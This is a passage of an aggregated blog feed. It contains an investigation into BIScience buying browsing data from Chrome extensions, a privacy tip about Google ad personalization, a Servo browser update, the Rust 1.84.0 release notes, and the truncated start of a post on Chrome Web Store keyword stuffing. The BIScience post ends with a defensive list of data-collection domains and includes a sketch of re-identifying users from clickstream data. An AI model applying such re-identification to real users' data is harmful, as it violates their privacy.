BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.

BIScience collects data from millions of users

BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.

The websites of BIScience and AdClarity make the following claims:

  • They collect data from 25 million users, over 250 million user events per day, 400 million unique domains
  • They process 4.5 petabytes of data every month
  • They are the “largest human panel based ad intelligence platform”

These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.

BIScience buys data from partner third-party extensions

BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.

Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.

Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.

BIScience receives raw data, not anonymized data

Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.

If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.

Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.

As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.

Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.
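To illustrate why a stable device ID defeats “anonymization,” here is a small sketch with made-up data. A single identifying URL (such as the email address visible in a query string) is enough to put a name on every record sharing the same device ID:

```javascript
// Illustrative only: fabricated clickstream records, all sharing one
// stable device ID, as described in the text above.
const clickstream = [
  { deviceId: "d-789", url: "https://news.example.com/article/42" },
  { deviceId: "d-789", url: "https://mail.example.com/inbox?user=jane.doe@example.com" },
  { deviceId: "d-789", url: "https://clinic.example.com/appointments" },
];

// Extract an email address from a URL's query string, if one is present.
function identifierFromUrl(url) {
  for (const value of new URL(url).searchParams.values()) {
    if (/^[^@\s]+@[^@\s]+\.[^@\s]+$/.test(value)) return value;
  }
  return null;
}

// Re-identify: one identifying URL names the person behind the device ID,
// and every other record with that ID becomes attributable to them.
function reidentify(records) {
  const identities = new Map();
  for (const r of records) {
    const id = identifierFromUrl(r.url);
    if (id) identities.set(r.deviceId, id);
  }
  return records.map(r => ({ ...r, person: identities.get(r.deviceId) ?? null }));
}

const labeled = reidentify(clickstream);
```

After this, even the visits to the news site and the clinic are attributed to jane.doe@example.com; dropping the email from future records would not help, because the device ID persists.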

BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):

In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.

Misleading CWS policies compliance

When you read the Chrome Web Store privacy disclosures on every extension listing, they say:

This developer declares that your data is

  • Not being sold to third parties, outside of approved use cases
  • Not being used or transferred for purposes that are unrelated to the item’s core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes

You might wonder:

  1. How is BIScience allowed to sell user data from their own extensions to third parties, through AdClarity and other BIScience products?
  2. How are partner extensions allowed to sell user data to BIScience, a third party?

BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:

  • if necessary to providing or improving your single purpose;
  • to comply with applicable laws;
  • to protect against malware, spam, phishing, or other fraud or abuse; or,
  • as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user

The Limited Use policy later states:

All other transfers, uses, or sale of user data is completely prohibited, including:

  • Transferring, using, or selling data for personalized advertisements.
  • Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
  • Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.

BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.

Chrome Web Store appears to interpret its policies as allowing the transfer of user data if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.

This is despite the CWS User Data FAQ stating (emphasis ours):

  1. Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
    No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.

In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.

Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt and allow the sale of user data obtained under false pretenses.

We have the receipts (contracts, emails, and more) to prove that BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily by “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.

BIScience extensions exception claims

Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.

These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs on servers, so they do not need to collect this data. They certainly don’t need to sell it to third parties.

Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.

Partner extensions exception claims, guided by BIScience

Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.

We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.

BIScience provides partner extensions with two integration options: they can add the BIScience SDK, which collects data automatically, or they can send their self-collected data to a BIScience API endpoint or S3 bucket.

The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.

BIScience SDK

The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.

The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can allege that it offers safe browsing protection or ad blocking. We have not evaluated how effective this safe browsing protection is compared to reputable vendors, but we suspect it performs minimal functionality to pass casual examination. We confirmed this endpoint also collects user data to resell it, which is unrelated to the safe browsing protection.

Unnecessary features

Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.

Let’s look at this illuminating graphic, sent by BIScience to one of our sources:

A block diagram titled “This feature, whatever it may be, should justify to Google Play or Google Chrome, why you are looking for access into users url visits information.” The scheme starts with a circle labeled “Get access to user’s browsing activity.” An arrow points towards a rectangle labeled “Send all URLs, visited by user, to your backend.” An arrow points to a rhombus labeled “Does the particular URL meets some criteria?” An asterisk in the rhombus points towards a text passage: “The criteria could fall under any of your preferences: -did you list the URL as malware? -is the URL a shopping website? -does the URL contain sensitive data? -is the URL travel related? etc.” An arrow labeled “No” points to a rectangle labeled “Do nothing; just store the URL and meta data.” An arrow labeled “Yes” points to a rectangle labeled “Store URL and meta data; provide related user functionality.” Both the original question and yes/no paths are contained within a larger box labeled “User functionality” but then have arrows pointing to another rectangle outside that box labeled “Send the data to Biscience endpoint.”

Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.

Misleading privacy policy disclosures

BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:

Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:

  • Detect and suggest to close malware websites;
  • Analytics and Traffic Intelligence

This and other suggested clauses contradict each other or are misleading to users.

Quick fact check:

  • Extension doesn’t sell your personal data: False, the main purpose of the integration with BIScience is to sell browsing history data.
  • Extension needs to share your personal data: False, this is not necessary for everyday business. Much less for veiled reasons such as malware protection or analytics.

An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.

Misleading user consent

BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.

As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:

Screenshot of a pop-up titled “Visual Effects is now offering Safe-Meeting.” The text says: “To allow us to enable integrated anti-mining and malicious site protection for the pages you visit please click agree to allow us access to your visited websites. Any and all data collected will be strictly anonymous.” Below it a prominent button with the label “Agree” and a much smaller link labeled “Disagree.”

We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.

Our hope for the future

When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.

Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.

If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.

Browser extension users deserve better privacy and transparency.

Related reading

If you want to learn more about browser extensions collecting your browsing history for profit:

IOCs

The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.

We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.

Collection endpoints seen in third-party extensions:

  • sclpfybn[.]com
  • tnagofsg[.]com

Collection endpoints seen in BIScience-owned extensions and software:

  • urban-vpn[.]com
  • ducunt[.]com
  • adclarity[.]com

Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):

  • sandvpn[.]com
  • getsugar[.]io

Collection endpoints seen in online data, software unknown but likely in third-party software:

  • cykmyk[.]com
  • fenctv[.]com

Collection endpoint in third-party software, identified in 2019 DataSpii research:

  • pnldsk[.]adclarity[.]com

Don MartiClick this to buy better stuff and be happier

Here’s my contender for Internet tip of the year. It’s going to take under a minute, and will not just help you buy better stuff, but also make you happier in general. Ready? Here it is, step by step.

  1. Log in to your Google account if you’re not logged in already. (If you have a Gmail or Google Drive tab open in the browser, you’re logged in.)

  2. Go to My Ad Center.

  3. Find the Personalized ads control. It looks something like this.

<figcaption>Personalized ads on</figcaption>

  4. Turn it off.

<figcaption>Personalized ads off</figcaption>

  5. That’s it. Unless you have another Google account. If you do have multiple Google accounts (like home, school, and work accounts), do this for each one.

This will affect the ads you get on all the Google sites and apps, including Google Search and YouTube, along with the Google ads on other sites. Google is probably going to show you some message to try to discourage you from doing this. From what I can tell from the outside, it looks like turning off personalized ads will cost Google money. Last time I checked, I got the following message.

Ads may seem less relevant When your info isn’t used for ads, you may see fewer ads for products and brands that interest you. Non-personalized ads on Google are shown to you according to factors like the time of day, device type, your current search or the website you’re visiting, or your current location (based on your IP address or device permissions).

But what they don’t say is anything about how personalized ads will help you buy better products and services. And that’s because—and I’m going out on a limb here data-wise, but a pretty short and solid limb, and I’ll explain why—they just don’t. Choosing to turn off personalized ads somehow makes you a more satisfied shopper and better off.

How does this work?

I still don’t know exactly how this tip works, but so far there have been a few theories.

1: lower fraud risk. It’s possible that de-personalizing the ads reduces the number of scam advertisers who can successfully reach you. Bian et al., in Consumer Surveillance and Financial Fraud, show that Apple App Tracking Transparency, which reduces the ability of apps to personalize ads, tended to reduce fraud complaints to the FTC.

We estimate that the reduction in tracking reduces money lost in all complaints by 4.7% and money lost reported in internet and data security complaints by 40.1%.

That’s a pretty big effect. De-personalizing ads might mean that your employer doesn’t get compromised by an ad campaign that delivers malware targeting a specific company, and that you don’t get served fake ads aimed at users of a particular software product. Even if the increase in fraud risk for users with personalization left on is relatively small, getting scammed has a big impact and can move the average money and happiness metrics a lot.

2: more mindful buying. Another possibility is that people who get fewer personalized ads are making fewer impulse purchases. Jessica Fierro and Corrine Reichert bought a selection of products from those Temu ads that seem to be everywhere, and decided they weren’t worth it. Maybe people without personalized ads are making fewer buying decisions but each one is better thought out.

3. buy more from higher quality vendors. Or maybe companies that put more money into personalized advertising tend to put less into improving product quality. (ICYMI: Product is the P all marketers should strive to influence, by Mark Ritson.) In Behavioral advertising and consumer welfare: An empirical investigation, Mustri et al. found that

targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products, compared to competing alternatives found in organic search results

In Why Your Brand Feels Like a Cheap Date: All Flash, No Substance in the World of Performance Marketing, Pesach Lattin writes,

Between 2019 and 2021, brands that focused on brand equity saw a 72% increase in value, compared to just 20% for brands that relied primarily on performance tactics. Ignoring brand-building not only weakens your baseline sales but forces you to spend more and more on performance marketing just to keep your head above water.

Brands that are over-focused on surveillance advertising might be forced to under-invest in product improvements.

4. limited algorithmic and personalized pricing. Personalized ads might be set up to offer the same product at higher prices to some people. The FTC was investigating, but from the research point of view, personalized pricing is really hard to tell apart from dynamic pricing. Even if you get volunteers to report prices, some might be getting a higher price because stock is running low, not because of who the individual is. So it’s hard to show how much impact this has, but hard to rule it out too.

5. it’s just a step on the journey. Another possibility is that de-personalizing the ads is a gateway to blocking ads entirely. What if, without personalization, the ads get gross or annoying enough that people tend to move up to an ad blocker? And, according to Lin et al. in The Welfare Effects of Ad Blocking,

[P]articipants that were asked to install an ad-blocker become less likely to regret recent purchases, while participants that were asked to uninstall their ad-blocker report lower levels of satisfaction with their recent purchases.

Maybe you don’t actually make better buying decisions while ads are on but personalization is off—but it’s a step toward full ad blocking where you do get better stuff and more happiness.

How do I know this works?

I’m confident that this tip works because if turning ad personalization off didn’t help you, Google would have said so a while ago. Remember the 52% paper about third-party cookies? Google made a big deal out of researching the ad revenue impact of turning cookie tracking on or off. And this ad personalization setting also has a revenue impact for Google. According to documents from one of Google’s Federal cases, keeping the number of users with ad personalization off low is a goal for Google—they make more money from you if you have personalization on, so they have a big incentive to try to convince you that personalization is a win-win. So why so quiet? The absence of a PDF about this is just as informative as the actual PDF would be.

And it’s not just Google. Research showing user benefits from personalized ads would be a fairly easy project not just for Google, but for any company that can both check a privacy setting and measure some kind of shopping outcome. For almost as long as Internet privacy tools have been a thing, Internet Thought Leaders have been telling us they’re not a good idea. But for a data-driven industry, they’re bringing surprisingly little data—especially considering that for many companies it’s data they already have and would only need to do stats on, make graphs, and write (or have an LLM write) the abstract and body copy.

Almost any company with a mobile app could do research to show any benefits from ad personalization, too. Are the customers who use Apple iOS and turn off tracking more or less satisfied with their orders? Do banks get more fraud reports from app users with tracking turned on or off? It would be straightforward for a lot of companies to show that turning off personalization or turning on some privacy setting makes you a less happy customer—if it did.

The closest I have found so far is Balancing User Privacy and Personalization by Malika Korganbekova and Cole Zuber. This study simulated the effects of a privacy feature by truncating browsing history for some Wayfair shoppers, and found that people who were assigned to the personalized group and chose a product personalized to them were 10% less likely to return it than people in the non-personalized group. But that’s about a bunch of vendors of similar products that were all qualified by the same online shopping platform, not about the mix of honest and dishonest personalized ads that people get in total.

So go back and do the tip if you didn’t already, enjoy your improved shopping experience, and be happy.

More: effective privacy tips

Related

You can’t totally turn off ad personalization on Meta sites like Facebook, but there are settings to limit the flow of targeting data in or out. See Mad at Meta? Don’t Let Them Collect and Monetize Your Personal Data by Lena Cohen at the Electronic Frontier Foundation.

B L O C K in the U S A Ad blocking is trending up, and for the first time the people surveyed gave their number one reason as privacy, not annoyance or performance.

MimiOnuoha/missing-datasets: An overview and exploration of the concept of missing datasets. by Mimi Onuoha: That which we ignore reveals more than what we give our attention to. It’s in these things that we find cultural and colloquial hints of what is deemed important. Spots that we’ve left blank reveal our hidden social biases and indifferences.

The $16 hack to blocking ads on your devices for life (I don’t know about the product or the offer, just interesting to see it on a site with ads. Maybe the affiliate revenue is a much bigger deal than the programmatic ad revenue?)

personalization risks: In practice, most of the privacy risks related to advertising are the result not of identifying individuals, but of treating different people in the same context differently.

Bonus links

Samuel Bendett and David Kirichenko cover Battlefield Drones and the Accelerating Autonomous Arms Race in Ukraine. Ukrainian officials started to describe their country as a war lab for the future—highlighting for allies and partners that, because these technologies will have a significant impact on warfare going forward, the ongoing combat in Ukraine offers the best environment for continuous testing, evaluation, and refinement of [autonomous] systems. Many companies across Europe and the United States have tested their drones and other systems in Ukraine. At this point in the conflict, these companies are striving to gain battle-tested in Ukraine credentials for their products.

Aram Zucker-Scharff writes, in The bounty hunter tendency, the future of privacy, and ad tech’s new profit frontier., The new generation of laws that are authorizing citizens to become bounty hunters are implicitly tied to the use of surveillance technology. They encourage the use of citizen vs citizen surveillance and create a dangerous environment that worsens the information imbalance between wealthy citizens and everyone else. (Is this a good argument against private right of action in privacy laws? It’s likely that troll lawyers will use existing wiretapping laws against legit news sites, which tend to have long and vulnerable lists of adtech partners.)

Scharon Harding covers TVs at CES 2025. On the one hand, TVs are adding far-field microphones which, um, yikes. But on the other hand, remember how the Microsoft Windows business and gaming market helped drive down the costs of Linux-capable workstation-class hardware? What is the big innovation that developers, designers, and architects will make out of big, inexpensive screens subsidized by the surveillance business?

The Servo BlogThis month in Servo: dark mode, keyword sizes, XPath, and more!

Servo now supports dark mode (@arthmis, @lazypassion, #34532), respecting the platform dark mode in servoshell and ‘prefers-color-scheme’ (@nicoburns, #34423, stylo#93) on Windows and macOS.

servoshell in dark mode, rendering the MDN article for ‘prefers-color-scheme’ in dark mode, when Windows is set to dark mode servoshell in light mode, rendering the MDN article for ‘prefers-color-scheme’ in light mode, when Windows is set to light mode
<figcaption>MDN article for ‘prefers-color-scheme’ in dark mode (left) and light mode (right), with --pref dom.resize_observer.enabled.</figcaption>

CSS transitions can now be triggered properly by script (@mrobinson, #34486), and we now support ‘min-height’ and ‘max-height’ on column flex containers (@Loirooriol, @mrobinson, #34450), ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ in block layout (@Loirooriol, #34641, #34568, #34695), ‘stretch’ on replaced positioned elements (@Loirooriol, #34430), as well as ‘align-self: self-start’, ‘self-end’, ‘left’, and ‘right’ on positioned elements (@taniishkaaa, @Loirooriol, #34365).

Servo can now run Discord well enough to log in and read messages, though you can’t send messages yet. To get this working, we landed some bare-bones AbortController support (@jdm, @syvb, #34519) and a WebSocket fix (@jdm, #34634). Try it yourself with --pref dom.svg.enabled --pref dom.intersection_observer.enabled --pref dom.abort_controller.enabled!

Discord login screen in Servo, showing form input and a QR code that never finishes loading Discord loading screen in Servo, after logging in
Discord channel screen in Servo, showing a few of Diffie’s messages and attachments

We now support console.trace() (@simonwuelker, #34629), PointerEvent (@wusyong, #34437), and the clonable property on ShadowRoot (@simonwuelker, #34514). Shadow DOM support continues to improve (@jdm, #34503), including very basic Shadow DOM layout (@mrobinson, #34701) when enabled via --pref dom.shadowdom.enabled.

script underwent (and continues to undergo) major rework towards being more reliable and faster to build. We’ve landed better synchronisation for DOM tree mutations (@jdm, #34505) and continued work on splitting up the script crate (@jdm, #34366). We’ve moved our ReadableStream support into Servo, eliminating the maintenance burden of a downstream SpiderMonkey patch (@gterzian, @wusyong, @Taym95, #34064, #34675).

The web platform guarantees that same-origin frames and their parents can synchronously observe resizes and their effects. Many tests rely on this, and not doing this correctly made Servo’s test results much flakier than they could otherwise be. We’ve made very good progress towards fixing this (@mrobinson, #34643, #34656, #34702, #34609), with correct resizing in all cases except when a same-origin frame is in another script thread, which is rare.

We now support enough of XPath to get htmx working (@vlindhol, #34463), when enabled via --pref dom.xpath.enabled.

htmx home page in Servo, with the hero banner thing now working (it relies on XPath)

Servo’s performance continues to improve, with layout caching for flex columns delivering up to 12x speedup (@Loirooriol, @mrobinson, #34461), many unnecessary reflows now eliminated (@mrobinson, #34558, #34599, #34576, #34645), reduced memory usage (@mrobinson, @Loirooriol, #34563, #34666), faster rendering for pages with animations (@mrobinson, #34489), and timers now operating without IPC (@mrobinson, #34581).

servoshell nightlies are up to 20% smaller (@atbrakhi, #34340), WebGPU is now optional at build time (@atbrakhi, #34444), and --features tracing no longer enables --features layout-2013 (@jschwe, #34515) for further binary size savings. You can also limit the size of several of Servo’s thread pools with --pref threadpools.fallback_worker_num and others (@jschwe, #34478), which is especially useful on machines with many CPU cores.

We’ve started laying the groundwork for full incremental layout in our new layout engine, starting with a general layout caching mechanism (@mrobinson, @Loirooriol, #34507, #34513, #34530, #34586). This was lost in the switch to our new layout engine, and without it, every time a page changes, we have to rerun layout from scratch. As you can imagine, this is very, very expensive, and incremental layout is critical for performance on today’s highly dynamic web.

Donations

Thanks again for your generous support! We are now receiving 4329 USD/month (+0.8% over November) in recurring donations. With this money, we’ve been able to cover our web hosting and self-hosted CI runners for Windows, Linux, and now macOS builds (@delan, #34868), halving mach try build times from over an hour to under 30 minutes! Next month, we’ll be expanding our CI capacity further, all made possible thanks to your help.

Servo is also on thanks.dev, and already sixteen GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.


As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

The Rust Programming Language BlogAnnouncing Rust 1.84.0

The Rust team is happy to announce a new version of Rust, 1.84.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.84.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.84.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.84.0 stable

Cargo considers Rust versions for dependency version selection

1.84.0 stabilizes the minimum supported Rust version (MSRV) aware resolver, which prefers dependency versions compatible with the project's declared MSRV. This reduces toil for maintainers supporting older toolchains, who no longer need to manually select older versions for each dependency.

You can opt-in to the MSRV-aware resolver via .cargo/config.toml:

[resolver]
incompatible-rust-versions = "fallback"

Then when adding a dependency:

$ cargo add clap
    Updating crates.io index
warning: ignoring clap@4.5.23 (which requires rustc 1.74) to maintain demo's rust-version of 1.60
      Adding clap v4.0.32 to dependencies
    Updating crates.io index
     Locking 33 packages to latest Rust 1.60 compatible versions
      Adding clap v4.0.32 (available: v4.5.23, requires Rust 1.74)

When verifying the latest dependencies in CI, you can override this:

$ CARGO_RESOLVER_INCOMPATIBLE_RUST_VERSIONS=allow cargo update
    Updating crates.io index
     Locking 12 packages to latest compatible versions
    Updating clap v4.0.32 -> v4.5.23

You can also opt-in by setting package.resolver = "3" in the Cargo.toml manifest file though that will require raising your MSRV to 1.84. The new resolver will be enabled by default for projects using the 2024 edition (which will stabilize in 1.85).
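For illustration, a minimal manifest using this opt-in might look like the following sketch (the package name and dependency are placeholders, not from the release notes):

```toml
[package]
name = "demo"           # placeholder package name
edition = "2021"
rust-version = "1.84"   # declared MSRV; resolver "3" requires 1.84+
resolver = "3"          # opt in to the MSRV-aware resolver

[dependencies]
clap = "4"              # resolved to a version compatible with rust-version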

This gives library authors more flexibility when deciding their policy on adopting new Rust toolchain features. Previously, a library adopting features from a new Rust toolchain would force downstream users of that library who have an older Rust version to either upgrade their toolchain or manually select an old version of the library compatible with their toolchain (and avoid running cargo update). Now, those users will be able to automatically use older library versions compatible with their older toolchain.

See the documentation for more considerations when deciding on an MSRV policy.

Migration to the new trait solver begins

The Rust compiler is in the process of moving to a new implementation for the trait solver. The next-generation trait solver is a reimplementation of a core component of Rust's type system. It is not only responsible for checking whether trait bounds (e.g. Vec<T>: Clone) hold, but is also used by many other parts of the type system, such as normalization (figuring out the underlying type of <Vec<T> as IntoIterator>::Item) and equating types (checking whether T and U are the same).
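As a small illustration (our own example; the function name `first_item` is not from the release notes), both of these solver tasks show up in ordinary generic code:

```rust
// The solver must (1) prove the trait bound `Vec<T>: Clone` holds and
// (2) normalize the associated type `<Vec<T> as IntoIterator>::Item` to `T`.
fn first_item<T>(v: Vec<T>) -> Option<<Vec<T> as IntoIterator>::Item>
where
    Vec<T>: Clone, // bound the solver checks at the call site
{
    let _backup = v.clone(); // legal only because the bound holds
    v.into_iter().next() // yields `<Vec<T> as IntoIterator>::Item`, i.e. `T`
}

fn main() {
    assert_eq!(first_item(vec![10, 20, 30]), Some(10));
    assert_eq!(first_item(Vec::<u8>::new()), None);
}
```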

In 1.84, the new solver is used for checking coherence of trait impls. At a high level, coherence is responsible for ensuring that there is at most one implementation of a trait for a given type while considering not yet written or visible code from other crates.

This stabilization fixes a few mostly theoretical correctness issues of the old implementation, resulting in potential "conflicting implementations of trait ..." errors that were not previously reported. We expect the affected patterns to be very rare based on evaluation of available code through Crater. The stabilization also improves our ability to prove that impls do not overlap, allowing more code to be written in some cases.

For more details, see a previous blog post and the stabilization report.

Strict provenance APIs

In Rust, pointers are not simply an "integer" or "address". For instance, a "use after free" is undefined behavior even if you "get lucky" and the freed memory gets reallocated before your read/write. As another example, writing through a pointer derived from an &i32 reference is undefined behavior, even if writing to the same address via a different pointer is legal. The underlying pattern here is that the way a pointer is computed matters, not just the address that results from this computation. For this reason, we say that pointers have provenance: to fully characterize pointer-related undefined behavior in Rust, we have to know not only the address the pointer points to, but also track which other pointer(s) it is "derived from".

Most of the time, programmers do not need to worry much about provenance, and it is very clear how a pointer was derived. However, when casting pointers to integers and back, the provenance of the resulting pointer is underspecified. With this release, Rust is adding a set of APIs that can in many cases replace integer-pointer casts, and therefore avoid the ambiguities inherent to such casts. In particular, the pattern of using the lowest bits of an aligned pointer to store extra information can now be implemented without ever casting a pointer to an integer or back. This makes the code easier to reason about, easier for the compiler to analyze, and also benefits tools like Miri and architectures like CHERI that aim to detect and diagnose pointer misuse.

For more details, see the standard library documentation on provenance.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.84.0

Many people came together to create Rust 1.84.0. We couldn't have done it without all of you. Thanks!

Wladimir PalantHow extensions trick CWS search

A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, except that Norton Password Manager has moved to the top of the list:

Screenshot of Chrome Web Store search results listing six extensions. While Norton Password Manager is at the top, the remaining search results like “Vytal - Spoof Timezone, Geolocation & Locale”, “Free VPN - 1VPN” or “Charm - Coupons, Promo Codes, & Discounts” appear completely unrelated. All extensions are marked as featured.

I was stumped as to how Google had managed to mess up search results so badly, and even posted the following on Mastodon:

Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn’t be due to incompetence, right? What is it then?

Somebody suggested that the extensions had somehow managed to pay Google for this placement, which seems… well, rather unlikely. For reasons, I came back to this a few weeks ago and decided to take a closer look at the extensions displayed there. They seemed shady, with at least three results being former open source extensions (as in: still claiming to be open source, but the linked code repository did not contain the current state of the code).

And then I somehow happened to see what it looks like when I change Chrome Web Store language:

Screenshot of Chrome Web Store search results listing the same six extensions. The change in language is visible because the “Featured” badge is now called something else. All extension descriptions are still English however, but they are different. 1VPN calls itself “Browsec vpn urban vpn touch tunnelbear vpn 1click vpn 1clickvpn - 1VPN” and Vytal calls itself “Vytal - Works With 1click VPN & Hotspot VPN”.

Now I don’t claim to know Swahili but what happened here clearly wasn’t translating.

The trick

Google Chrome is currently available in 55 languages. Browser extensions can choose to support any subset of these languages, though most support exactly one. Not only can the extension’s user interface be translated; its name and short description can be made available in multiple languages as well. Chrome Web Store serves such translations according to the user’s selected language. Chrome Web Store also has an extensive description field which isn’t contained within the extension itself but can likewise be translated.

Apparently, some extension authors figured out that the Chrome Web Store search index is shared across all languages. If you wanted to show up in searches for your competitors, for example, you could add their names to your extension’s description – but that might come across as spammy. So what you do instead is sacrifice some of the “less popular” languages and stuff their descriptions full of relevant keywords. Your extension then starts showing up for these keywords even when they are entered in the English version of the Chrome Web Store. After all, who cares about Swahili other than maybe five million native speakers?
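Mechanically, this rides on the standard extension localization system: manifest.json references __MSG_…__ placeholders (with a default_locale), and the per-language strings live in _locales/<lang>/messages.json files. A hypothetical abusive _locales/sw/messages.json (extension name invented for illustration; the stuffed keywords mirror those visible in the screenshot below) might pair an innocuous English file with something like this:

```json
{
  "appName": {
    "message": "Example Coupon Finder"
  },
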